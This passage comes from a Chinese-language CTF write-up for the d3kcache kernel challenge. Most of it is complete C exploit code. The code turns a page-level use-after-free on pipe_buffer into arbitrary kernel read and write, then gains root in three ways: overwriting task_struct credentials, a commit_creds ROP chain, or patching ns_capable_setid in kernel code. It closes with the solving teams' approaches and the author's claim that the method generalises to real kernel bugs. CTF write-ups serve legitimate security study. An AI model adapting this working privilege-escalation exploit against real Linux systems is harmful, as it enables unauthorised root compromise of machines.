    read(pipe_fd[victim_pid][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
    read(pipe_fd[victim_pid][0], &info_pipe_buf, sizeof(info_pipe_buf));

    printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n" 
           "\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n", 
           info_pipe_buf.page, info_pipe_buf.ops);

    if ((size_t) info_pipe_buf.page < 0xffff000000000000
        || (size_t) info_pipe_buf.ops < 0xffffffff81000000) {
        err_exit("FAILED to re-hit victim page!");
    }

    puts("\033[32m\033[1m[+] Successfully to hit the UAF page!\033[0m");
    printf("\033[32m\033[1m[+] Got page leak:\033[0m %p\n", info_pipe_buf.page);
    puts("");

    /* construct a second-level page uaf */
    puts("[*] construct a second-level uaf pipe page...");
    info_pipe_buf.page = (struct page*) ((size_t) info_pipe_buf.page + 0x40);
    write(pipe_fd[victim_pid][1], &info_pipe_buf, sizeof(info_pipe_buf));

    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        int nr;

        if (i == orig_pid || i == victim_pid) {
            continue;
        }

        read(pipe_fd[i][0], &nr, sizeof(nr));
        if (nr < PIPE_SPRAY_NUM && i != nr) {
            snd_orig_pid = nr;
            snd_vicitm_pid = i;
            printf("\033[32m\033[1m[+] Found second-level victim: \033[0m%d "
                   "\033[32m\033[1m, orig: \033[0m%d\n", 
                   snd_vicitm_pid, snd_orig_pid);
            break;
        }
    }

    if (snd_vicitm_pid == -1) {
        err_exit("FAILED to corrupt second-level pipe_buffer!");
    }
}

/**
 * VI - SECONDARY exploit stage: build pipe for arbitrary read & write
*/

void building_self_writing_pipe(void)
{
    size_t buf[0x1000];
    size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ/sizeof(struct pipe_buffer));
    struct pipe_buffer evil_pipe_buf;
    struct page *page_ptr;

    memset(buf, 0, sizeof(buf));

    /* let the page's ptr at pipe_buffer */
    write(pipe_fd[snd_vicitm_pid][1], buf, TRD_PIPE_BUF_SZ - 24 -3*sizeof(int));

    /* free orignal pipe's page */
    puts("[*] free second-level original pipe...");
    close(pipe_fd[snd_orig_pid][0]);
    close(pipe_fd[snd_orig_pid][1]);

    /* try to rehit victim page by reallocating pipe_buffer */
    puts("[*] fcntl() to set the pipe_buffer on second-level victim page...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pid || i == victim_pid 
            || i == snd_orig_pid || i == snd_vicitm_pid) {
            continue;
        }

        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0) {
            printf("[x] failed to resize %d pipe!\n", i);
            err_exit("FAILED to re-alloc pipe_buffer!");
        }
    }

    /* let a pipe->bufs pointing to itself */
    puts("[*] hijacking the 2nd pipe_buffer on page to itself...");
    evil_pipe_buf.page = info_pipe_buf.page;
    evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.ops = info_pipe_buf.ops;
    evil_pipe_buf.flags = info_pipe_buf.flags;
    evil_pipe_buf.private = info_pipe_buf.private;

    write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

    /* check for third-level victim pipe */
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pid || i == victim_pid 
            || i == snd_orig_pid || i == snd_vicitm_pid) {
            continue;
        }

        read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
        if (page_ptr == evil_pipe_buf.page) {
            self_2nd_pipe_pid = i;
            printf("\033[32m\033[1m[+] Found self-writing pipe: \033[0m%d\n", 
                    self_2nd_pipe_pid);
            break;
        }
    }

    if (self_2nd_pipe_pid == -1) {
        err_exit("FAILED to build a self-writing pipe!");
    }

    /* overwrite the 3rd pipe_buffer to this page too */
    puts("[*] hijacking the 3rd pipe_buffer on page to itself...");
    evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

    write(pipe_fd[snd_vicitm_pid][1],buf,TRD_PIPE_BUF_SZ-sizeof(evil_pipe_buf));
    write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

    /* check for third-level victim pipe */
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pid || i == victim_pid 
            || i == snd_orig_pid || i == snd_vicitm_pid
            || i == self_2nd_pipe_pid) {
            continue;
        }

        read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
        if (page_ptr == evil_pipe_buf.page) {
            self_3rd_pipe_pid = i;
            printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m"
                    "%d\n", self_3rd_pipe_pid);
            break;
        }
    }

    if (self_3rd_pipe_pid == -1) {
        err_exit("FAILED to build a self-writing pipe!");
    }

    /* overwrite the 4th pipe_buffer to this page too */
    puts("[*] hijacking the 4th pipe_buffer on page to itself...");
    evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

    write(pipe_fd[snd_vicitm_pid][1],buf,TRD_PIPE_BUF_SZ-sizeof(evil_pipe_buf));
    write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

    /* check for third-level victim pipe */
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pid || i == victim_pid 
            || i == snd_orig_pid || i == snd_vicitm_pid
            || i == self_2nd_pipe_pid || i== self_3rd_pipe_pid) {
            continue;
        }

        read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
        if (page_ptr == evil_pipe_buf.page) {
            self_4th_pipe_pid = i;
            printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m"
                    "%d\n", self_4th_pipe_pid);
            break;
        }
    }

    if (self_4th_pipe_pid == -1) {
        err_exit("FAILED to build a self-writing pipe!");
    }

    puts("");
}

struct pipe_buffer evil_2nd_buf, evil_3rd_buf, evil_4th_buf;
char temp_zero_buf[0x1000]= { '\0' };

/**
 * @brief Setting up 3 pipes for arbitrary read & write.
 * We need to build a circle there for continuously memory seeking:
 * - 2nd pipe to search
 * - 3rd pipe to change 4th pipe
 * - 4th pipe to change 2nd and 3rd pipe
 */
void setup_evil_pipe(void)
{
    /* init the initial val for 2nd,3rd and 4th pipe, for recovering only */
    memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
    memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
    memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

    evil_2nd_buf.offset = 0;
    evil_2nd_buf.len = 0xff0;

    /* hijack the 3rd pipe pointing to 4th */
    evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
    evil_3rd_buf.len = 0;
    write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

    evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
    evil_4th_buf.len = 0;
}

void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
    /* page to read */
    evil_2nd_buf.offset = 0;
    evil_2nd_buf.len = 0x1ff8;
    evil_2nd_buf.page = page_to_read;

    /* hijack the 4th pipe pointing to 2nd pipe */
    write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

    /* hijack the 2nd pipe for arbitrary read */
    write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
    write(pipe_fd[self_4th_pipe_pid][1], 
          temp_zero_buf, 
          TRD_PIPE_BUF_SZ-sizeof(evil_2nd_buf));
    
    /* hijack the 3rd pipe to point to 4th pipe */
    write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

    /* read out data */
    read(pipe_fd[self_2nd_pipe_pid][0], dst, 0xfff);
}

void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
    /* page to write */
    evil_2nd_buf.page = page_to_write;
    evil_2nd_buf.offset = 0;
    evil_2nd_buf.len = 0;

    /* hijack the 4th pipe pointing to 2nd pipe */
    write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

    /* hijack the 2nd pipe for arbitrary read, 3rd pipe point to 4th pipe */
    write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
    write(pipe_fd[self_4th_pipe_pid][1], 
          temp_zero_buf, 
          TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));
    
    /* hijack the 3rd pipe to point to 4th pipe */
    write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

    /* write data into dst page */
    write(pipe_fd[self_2nd_pipe_pid][1], src, len);
}

/**
 * VII - FINAL exploit stage with arbitrary read & write
*/

size_t *tsk_buf, current_task_page, current_task, parent_task, buf[0x1000];


void info_leaking_by_arbitrary_pipe()
{
    size_t *comm_addr;

    memset(buf, 0, sizeof(buf));

    puts("[*] Setting up kernel arbitrary read & write...");
    setup_evil_pipe();

    /**
     * KASLR's granularity is 256MB, and pages of size 0x1000000 is 1GB MEM,
     * so we can simply get the vmemmap_base like this in a SMALL-MEM env.
     * For MEM > 1GB, we can just find the secondary_startup_64 func ptr,
     * which is located on physmem_base + 0x9d000, i.e., vmemmap_base[156] page.
     * If the func ptr is not there, just vmemmap_base -= 256MB and do it again.
     */
    vmemmap_base = (size_t) info_pipe_buf.page & 0xfffffffff0000000;
    for (;;) {
        arbitrary_read_by_pipe((struct page*) (vmemmap_base + 157 * 0x40), buf);

        if (buf[0] > 0xffffffff81000000 && ((buf[0] & 0xfff) == 0x070)) {
            kernel_base = buf[0] -  0x070;
            kernel_offset = kernel_base - 0xffffffff81000000;
            printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
                   "\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n", 
                   kernel_base, kernel_offset);
            break;
        }

        vmemmap_base -= 0x10000000;
    }
    printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);

    /* now seeking for the task_struct in kernel memory */
    puts("[*] Seeking task_struct in memory...");

    prctl(PR_SET_NAME, "arttnba3pwnn");

    /**
     * For a machine with MEM less than 256M, we can simply get the:
     *      page_offset_base = heap_leak & 0xfffffffff0000000;
     * But that's not always accurate, espacially on a machine with MEM > 256M.
     * So we need to find another way to calculate the page_offset_base.
     * 
     * Luckily the task_struct::ptraced points to itself, so we can get the
     * page_offset_base by vmmemap and current task_struct as we know the page.
     * 
     * Note that the offset of different filed should be referred to your env.
     */
    for (int i = 0; 1; i++) {
        arbitrary_read_by_pipe((struct page*) (vmemmap_base + i * 0x40), buf);
    
        comm_addr = memmem(buf, 0xf00, "arttnba3pwnn", 12);
        if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
            && (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
            && (comm_addr[-57] > 0xffff888000000000) /* task->read_parent */
            && (comm_addr[-56] > 0xffff888000000000)) {  /* task->parent */

            /* task->read_parent */
            parent_task = comm_addr[-57];

            /* task_struct::ptraced */
            current_task = comm_addr[-50] - 2528;

            page_offset_base = (comm_addr[-50]&0xfffffffffffff000) - i * 0x1000;
            page_offset_base &= 0xfffffffff0000000;

            printf("\033[32m\033[1m[+] Found task_struct on page: \033[0m%p\n",
                   (struct page*) (vmemmap_base + i * 0x40));
            printf("\033[32m\033[1m[+] page_offset_base: \033[0m0x%lx\n",
                   page_offset_base);
            printf("\033[34m\033[1m[*] current task_struct's addr: \033[0m"
                   "0x%lx\n\n", current_task);
            break;
        }
    }
}

/**
 * @brief find the init_task and copy something to current task_struct
*/
void privilege_escalation_by_task_overwrite(void)
{
    /* finding the init_task, the final parent of every task */
    puts("[*] Seeking for init_task...");

    for (;;) {
        size_t ptask_page_addr = direct_map_addr_to_page_addr(parent_task);

        tsk_buf = (size_t*) ((size_t) buf + (parent_task & 0xfff));

        arbitrary_read_by_pipe((struct page*) ptask_page_addr, buf);
        arbitrary_read_by_pipe((struct page*) (ptask_page_addr+0x40),&buf[512]);

        /* task_struct::real_parent */
        if (parent_task == tsk_buf[309]) {
            break;
        }

        parent_task = tsk_buf[309];
    }

    init_task = parent_task;
    init_cred = tsk_buf[363];
    init_nsproxy = tsk_buf[377];

    printf("\033[32m\033[1m[+] Found init_task: \033[0m0x%lx\n", init_task);
    printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);
    printf("\033[32m\033[1m[+] Found init_nsproxy:\033[0m0x%lx\n",init_nsproxy);

    /* now, changing the current task_struct to get the full root :) */
    puts("[*] Escalating ROOT privilege now...");

    current_task_page = direct_map_addr_to_page_addr(current_task);

    arbitrary_read_by_pipe((struct page*) current_task_page, buf);
    arbitrary_read_by_pipe((struct page*) (current_task_page+0x40), &buf[512]);

    tsk_buf = (size_t*) ((size_t) buf + (current_task & 0xfff));
    tsk_buf[363] = init_cred;
    tsk_buf[364] = init_cred;
    tsk_buf[377] = init_nsproxy;

    arbitrary_write_by_pipe((struct page*) current_task_page, buf, 0xff0);
    arbitrary_write_by_pipe((struct page*) (current_task_page+0x40),
                            &buf[512], 0xff0);

    puts("[+] Done.\n");
    puts("[*] checking for root...");

    get_root_shell();
}

#define PTE_OFFSET 12
#define PMD_OFFSET 21
#define PUD_OFFSET 30
#define PGD_OFFSET 39

#define PT_ENTRY_MASK 0b111111111UL
#define PTE_MASK (PT_ENTRY_MASK << PTE_OFFSET)
#define PMD_MASK (PT_ENTRY_MASK << PMD_OFFSET)
#define PUD_MASK (PT_ENTRY_MASK << PUD_OFFSET)
#define PGD_MASK (PT_ENTRY_MASK << PGD_OFFSET)

#define PTE_ENTRY(addr) ((addr >> PTE_OFFSET) & PT_ENTRY_MASK)
#define PMD_ENTRY(addr) ((addr >> PMD_OFFSET) & PT_ENTRY_MASK)
#define PUD_ENTRY(addr) ((addr >> PUD_OFFSET) & PT_ENTRY_MASK)
#define PGD_ENTRY(addr) ((addr >> PGD_OFFSET) & PT_ENTRY_MASK)

#define PAGE_ATTR_RW (1UL << 1)
#define PAGE_ATTR_NX (1UL << 63)

size_t pgd_addr, mm_struct_addr, *mm_struct_buf;
size_t stack_addr, stack_addr_another;
size_t stack_page, mm_struct_page;

size_t vaddr_resolve(size_t pgd_addr, size_t vaddr)
{
    size_t buf[0x1000];
    size_t pud_addr, pmd_addr, pte_addr, pte_val;

    arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pgd_addr), buf);
    pud_addr = (buf[PGD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
    pud_addr += page_offset_base;

    arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pud_addr), buf);
    pmd_addr = (buf[PUD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
    pmd_addr += page_offset_base;

    arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pmd_addr), buf);
    pte_addr = (buf[PMD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
    pte_addr += page_offset_base;

    arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pte_addr), buf);
    pte_val = (buf[PTE_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);

    return pte_val;
}

size_t vaddr_resolve_for_3_level(size_t pgd_addr, size_t vaddr)
{
    size_t buf[0x1000];
    size_t pud_addr, pmd_addr;

    arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pgd_addr), buf);
    pud_addr = (buf[PGD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
    pud_addr += page_offset_base;

    arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pud_addr), buf);
    pmd_addr = (buf[PUD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
    pmd_addr += page_offset_base;

    arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pmd_addr), buf);
    return (buf[PMD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
}

void vaddr_remapping(size_t pgd_addr, size_t vaddr, size_t paddr)
{
    size_t buf[0x1000];
    size_t pud_addr, pmd_addr, pte_addr;

    arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pgd_addr), buf);
    pud_addr = (buf[PGD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
    pud_addr += page_offset_base;

    arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pud_addr), buf);
    pmd_addr = (buf[PUD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
    pmd_addr += page_offset_base;

    arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pmd_addr), buf);
    pte_addr = (buf[PMD_ENTRY(vaddr)] & (~0xfff)) & (~PAGE_ATTR_NX);
    pte_addr += page_offset_base;

    arbitrary_read_by_pipe((void*) direct_map_addr_to_page_addr(pte_addr), buf);
    buf[PTE_ENTRY(vaddr)] = paddr | 0x8000000000000867; /* mark it writable */
    arbitrary_write_by_pipe((void*) direct_map_addr_to_page_addr(pte_addr), buf,
                            0xff0);
}

void pgd_vaddr_resolve(void)
{
    puts("[*] Reading current task_struct...");

    /* read current task_struct */
    current_task_page = direct_map_addr_to_page_addr(current_task);
    arbitrary_read_by_pipe((struct page*) current_task_page, buf);
    arbitrary_read_by_pipe((struct page*) (current_task_page+0x40), &buf[512]);

    tsk_buf = (size_t*) ((size_t) buf + (current_task & 0xfff));
    stack_addr = tsk_buf[4];
    mm_struct_addr = tsk_buf[292];

    printf("\033[34m\033[1m[*] kernel stack's addr:\033[0m0x%lx\n",stack_addr);
    printf("\033[34m\033[1m[*] mm_struct's addr:\033[0m0x%lx\n",mm_struct_addr);

    mm_struct_page = direct_map_addr_to_page_addr(mm_struct_addr);

    printf("\033[34m\033[1m[*] mm_struct's page:\033[0m0x%lx\n",mm_struct_page);

    /* read mm_struct */
    arbitrary_read_by_pipe((struct page*) mm_struct_page, buf);
    arbitrary_read_by_pipe((struct page*) (mm_struct_page+0x40), &buf[512]);

    mm_struct_buf = (size_t*) ((size_t) buf + (mm_struct_addr & 0xfff));

    /* only this is a virtual addr, others in page table are all physical addr*/
    pgd_addr = mm_struct_buf[9];

    printf("\033[32m\033[1m[+] Got kernel page table of current task:\033[0m"
           "0x%lx\n\n", pgd_addr);
}

/**
 * It may also be okay to write ROP chain on pipe_write's stack, if there's
 * no CONFIG_RANDOMIZE_KSTACK_OFFSET_DEFAULT(it can also be bypass by RETs). 
 * But what I want is a more novel and general exploitation that 
 * doesn't need any information about the kernel image. 
 * So just simply overwrite the task_struct is good :)
 * 
 * If you still want a normal ROP, refer to following codes.
*/

#define COMMIT_CREDS 0xffffffff811284e0
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff82201a90
#define INIT_CRED 0xffffffff83079ee8
#define POP_RDI_RET 0xffffffff810157a9
#define RET 0xffffffff810157aa

void privilege_escalation_by_rop(void)
{
    size_t rop[0x1000], idx = 0; 

    /* resolving some vaddr */
    pgd_vaddr_resolve();
    
    /* reading the page table directly to get physical addr of kernel stack*/
    puts("[*] Reading page table...");

    stack_addr_another = vaddr_resolve(pgd_addr, stack_addr);
    stack_addr_another &= (~PAGE_ATTR_NX); /* N/X bit */
    stack_addr_another += page_offset_base;

    printf("\033[32m\033[1m[+] Got another virt addr of kernel stack: \033[0m"
           "0x%lx\n\n", stack_addr_another);

    /* construct the ROP */
    for (int i = 0; i < ((0x1000 - 0x100) / 8); i++) {
        rop[idx++] = RET + kernel_offset;
    }

    rop[idx++] = POP_RDI_RET + kernel_offset;
    rop[idx++] = INIT_CRED + kernel_offset;
    rop[idx++] = COMMIT_CREDS + kernel_offset;
    rop[idx++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE +54 + kernel_offset;
    rop[idx++] = *(size_t*) "arttnba3";
    rop[idx++] = *(size_t*) "arttnba3";
    rop[idx++] = (size_t) get_root_shell;
    rop[idx++] = user_cs;
    rop[idx++] = user_rflags;
    rop[idx++] = user_sp;
    rop[idx++] = user_ss;

    stack_page = direct_map_addr_to_page_addr(stack_addr_another);

    puts("[*] Hijacking current task's stack...");

    sleep(5);

    arbitrary_write_by_pipe((struct page*) (stack_page + 0x40 * 3), rop, 0xff0);
}

void privilege_escalation_by_usma(void)
{
    #define NS_CAPABLE_SETID 0xffffffff810fd2a0

    char *kcode_map, *kcode_func;
    size_t dst_paddr, dst_vaddr, *rop, idx = 0;

    /* resolving some vaddr */
    pgd_vaddr_resolve();

    kcode_map = mmap((void*) 0x114514000, 0x2000, PROT_READ | PROT_WRITE, 
                     MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    if (!kcode_map) {
        err_exit("FAILED to create mmap area!");
    }

    /* because of lazy allocation, we need to write it manually */
    for (int i = 0; i < 8; i++) {
        kcode_map[i] = "arttnba3"[i];
        kcode_map[i + 0x1000] = "arttnba3"[i];
    }

    /* overwrite kernel code seg to exec shellcode directly :) */
    dst_vaddr = NS_CAPABLE_SETID + kernel_offset;
    printf("\033[34m\033[1m[*] vaddr of ns_capable_setid is: \033[0m0x%lx\n",
           dst_vaddr);

    dst_paddr = vaddr_resolve_for_3_level(pgd_addr, dst_vaddr);
    dst_paddr += 0x1000 * PTE_ENTRY(dst_vaddr);

    printf("\033[32m\033[1m[+] Got ns_capable_setid's phys addr: \033[0m"
           "0x%lx\n\n", dst_paddr);

    /* remapping to our mmap area */
    vaddr_remapping(pgd_addr, 0x114514000, dst_paddr);
    vaddr_remapping(pgd_addr, 0x114514000 + 0x1000, dst_paddr + 0x1000);

    /* overwrite kernel code segment directly */

    puts("[*] Start overwriting kernel code segment...");

    /**
     * The setresuid() check for user's permission by ns_capable_setid(),
     * so we can just patch it to let it always return true :)
     */
    memset(kcode_map + (NS_CAPABLE_SETID & 0xfff), '\x90', 0x40); /* nop */
    memcpy(kcode_map + (NS_CAPABLE_SETID & 0xfff) + 0x40, 
            "\xf3\x0f\x1e\xfa"  /* endbr64 */
            "H\xc7\xc0\x01\x00\x00\x00"  /* mov rax, 1 */
            "\xc3", /* ret */
            12);

    /* get root now :) */
    puts("[*] trigger evil ns_capable_setid() in setresuid()...\n");

    sleep(5);

    setresuid(0, 0, 0);
    get_root_shell();
}

/**
 * Just for testing CFI's availability :)
*/
void trigger_control_flow_integrity_detection(void)
{
    size_t buf[0x1000];
    struct pipe_buffer *pbuf = (void*) ((size_t)buf + TRD_PIPE_BUF_SZ);
    struct pipe_buf_operations *ops, *ops_addr;

    ops_addr = (struct pipe_buf_operations*) 
                 (((size_t) info_pipe_buf.page - vmemmap_base) / 0x40 * 0x1000);
    ops_addr = (struct pipe_buf_operations*)((size_t)ops_addr+page_offset_base);

    /* two random gadget :) */
    ops = (struct pipe_buf_operations*) buf;
    ops->confirm = (void*)(0xffffffff81a78568 + kernel_offset);
    ops->release = (void*)(0xffffffff816196e6 + kernel_offset);

    for (int i = 0; i < 10; i++) {
        pbuf->ops = ops_addr;
        pbuf = (struct pipe_buffer *)((size_t) pbuf + TRD_PIPE_BUF_SZ);
    }

    evil_2nd_buf.page = info_pipe_buf.page;
    evil_2nd_buf.offset = 0;
    evil_2nd_buf.len = 0;

    /* hijack the 4th pipe pointing to 2nd pipe */
    write(pipe_fd[self_3rd_pipe_pid][1],&evil_4th_buf,sizeof(evil_4th_buf));

    /* hijack the 2nd pipe for arbitrary read, 3rd pipe point to 4th pipe */
    write(pipe_fd[self_4th_pipe_pid][1],&evil_2nd_buf,sizeof(evil_2nd_buf));
    write(pipe_fd[self_4th_pipe_pid][1], 
          temp_zero_buf, 
          TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));
        
    /* hijack the 3rd pipe to point to 4th pipe */
    write(pipe_fd[self_4th_pipe_pid][1],&evil_3rd_buf,sizeof(evil_3rd_buf));

    /* write data into dst page */
    write(pipe_fd[self_2nd_pipe_pid][1], buf, 0xf00); 

    /* trigger CFI... */
    puts("[=] triggering CFI's detection...\n");
    sleep(5);
    close(pipe_fd[self_2nd_pipe_pid][0]);
    close(pipe_fd[self_2nd_pipe_pid][1]);
}

int main(int argc, char **argv, char **envp)
{
    /**
     * Step.O - fundamental works
     */

    save_status();

    /* bind core to 0 */
    bind_core(0);

    /* dev file */
    dev_fd = open("/dev/d3kcache", O_RDWR);
    if (dev_fd < 0) {
        err_exit("FAILED to open /dev/d3kcache!");
    }

    /* spray pgv pages */
    prepare_pgv_system();
    prepare_pgv_pages();

    /**
     * Step.I - page-level heap fengshui to make a cross-cache off-by-null,
     * making two pipe_buffer pointing to the same pages
     */
    corrupting_first_level_pipe_for_page_uaf();

    /**
     * Step.II - re-allocate the victim page to pipe_buffer,
     * leak page-related address and construct a second-level pipe uaf
     */
    corrupting_second_level_pipe_for_pipe_uaf();

    /**
     * Step.III - re-allocate the second-level victim page to pipe_buffer,
     * construct three self-page-pointing pipe_buffer 
     */
    building_self_writing_pipe();

    /**
     * Step.IV - leaking fundamental information by pipe
     */
    info_leaking_by_arbitrary_pipe();

    /**
     * Step.V - different method of exploitation
     */

    if (argv[1] && !strcmp(argv[1], "rop")) {
        /* traditionally root by rop */
        privilege_escalation_by_rop();
    } else if (argv[1] && !strcmp(argv[1], "cfi")) {
        /* extra - check for CFI's availability */
        trigger_control_flow_integrity_detection();
    } else if (argv[1] && !strcmp(argv[1], "usma")) {
        privilege_escalation_by_usma();
    }else {
        /* default: root by seeking init_task and overwrite current */
        privilege_escalation_by_task_overwrite();
    }

    /* we SHOULDN'T get there, so panic :( */
    trigger_control_flow_integrity_detection();
    
    return 0;
}

0x03.解题情况

本次比赛当中一共有 2 支队伍解出了笔者的题目，这个数量倒是出乎笔者的预料又在预料之中（~~既感觉好多又感觉好少~~），比较巧的是 刚好一支国内队伍与一支国外队伍 ：）

NU1L 战队的解法是利用 partial overwrite 覆写 msg_msg->m_list.next 构造 UAF（有点像 CVE-2021-22555 的解法），分配 msg_msgseg 来构造 fake msg_msg 实现越界读，之后利用 fcntl(F_SETPIPE_SZ) 改小 pipe_buffer 后转移 UAF 到 pipe_buffer 上从而构造 dirty pipe 覆写 busybox，不过比较出乎笔者预料的是他们并没有用页级堆风水，而是选择直接堆喷大量 msg_msg，这样题目所在的 slub 页面与 msg_msg 所在 slub 页面便还是有一定几率挨到一起（由于大小 0x1000 的 msg_msg 所在 slab 同样来自于 order-3，因此实际上仅纯堆喷也有一定的几率使得对应 slab 挨在一起）

TeamGoulash 的解法前半段与官方解法的中段基本上是一致的，即利用 fcntl(F_SETPIPE_SZ) 改大 pipe_buffer 到 order-3 后通过对 page 指针的 partial overwrite 构造 page-level 的 UAF，之后在 UAF page 上分配新的 pipe_buffer ，不过他们并没有像笔者那样继续构造自读写管道来完成内存空间任意读写，而是将 UAF page 分配为新进程的页表页面（由于 COW 机制，fork() 创建新进程的过程中其实仅会分配新的页表项及其他内核结构体，这使得我们有不小的概率使 UAF 页面被复用为页表中的某一级页面），之后将 busybox 映射到 UAF 页表项对应的内存空间，从而完成越权写入，由于缺乏有效的堆风水手段以及页分配的不稳定性导致成功率较低（毕竟分配过程当中还是有非常多的噪音，据该战队自述成功率只有 5%）

以及 TeamGoulash 为笔者展现了一个很有趣的操作：通过睡眠一定的时间使得旧的 TLB 无效化

两只战队的解法大体上其实都在预期之内（笔者一开始想的就是利用 msg_msg ），同时这道题目没有出现去年那样的大面积非预期情况，可喜可贺可喜可贺👏👏👏

0x04. 总结与反思

pipe_buffer arbitray read & write？

毫不谦虚地说，笔者认为自己出的这道题目在对于内核中内存损坏类型漏洞的 “通解” 的探索相比去年而言是有着一定距离的突破的——我们成功在一个非常极端的环境下完成了内核漏洞利用

而如果将官方解在不同漏洞场景下进行推广，得益于 pipe_buffer 大小的可调节性以及无需 bzImage 信息便能完成提权的便捷性，我们不难发现的是这个方法可以被很快地应用并推广到绝大部分的漏洞上，并在真实场景下完成漏洞利用，这也是为什么笔者要魔改《eva：终》的宣传语来作为题目描述——我们或许真的为内核内存损坏型漏洞找到了一种足够强大的通法：）

不过这种方法并非是笔者第一个发现的（虽然笔者一开始确乎这么以为），据笔者了解类似的改写 pipe_buffer.page 的方法似乎早已被应用到实战的安卓攻防当中，同时来自 Interrupt Labs 的研究员也在去年发现了这种方法

该 Lab 的安全研究员一开始也以为自己独立发现了一种新方法，结果一看 BlackHat 上好像讲过在安卓上已经存在在野利用了，~~和笔者同病相怜属于是~~

虽然说这种方法似乎没有被正式命名，但是既然早就存在在野利用的话那自然笔者是没有命名资格了，至少笔者不会为了所谓 “青史留名” 而擅自将这种早就出现过的利用方法冠上自己的名字（笑）

page-level UAF?

不过虽然说利用 pipe_buffer 进行内存任意读写的操作并非作者首创，但是 在内存页这一级进行 double free 以及 UAF 利用据笔者所知应该是笔者首创 ，有了 page-level UAF，我们可以很轻易地在不同的 kmem_cache 之间进行跨 kmem_cache 的 UAF 利用，从而打破 kmem_cache 甚至是直接进行内存页分配的其他子系统之间的间隔（例如页表），目前笔者所设想的利用手法有：

将一张 page 释放成为另一张 page，从而完成对指定内核对象的 UAF利用（这便是本题的做法）
- 可以是针对 page 进行 double free
- 也可以是 slab objects 的全部释放导致的 slab free 后的 page UAF
- …
将一张 page 释放为内核子系统中的某个组件
- 例如：页表
- …

作为刚刚出现在 CTF 当中的新的利用手法，page-level UAF 还有更多值得我们去探索的地方

Conclusion

总的来说，笔者对于自己今年所出的这一道题还是挺满意的，希望未来能够给大家带来更多更有趣的内核漏洞利用手法：）

0xFF. 一些小彩蛋
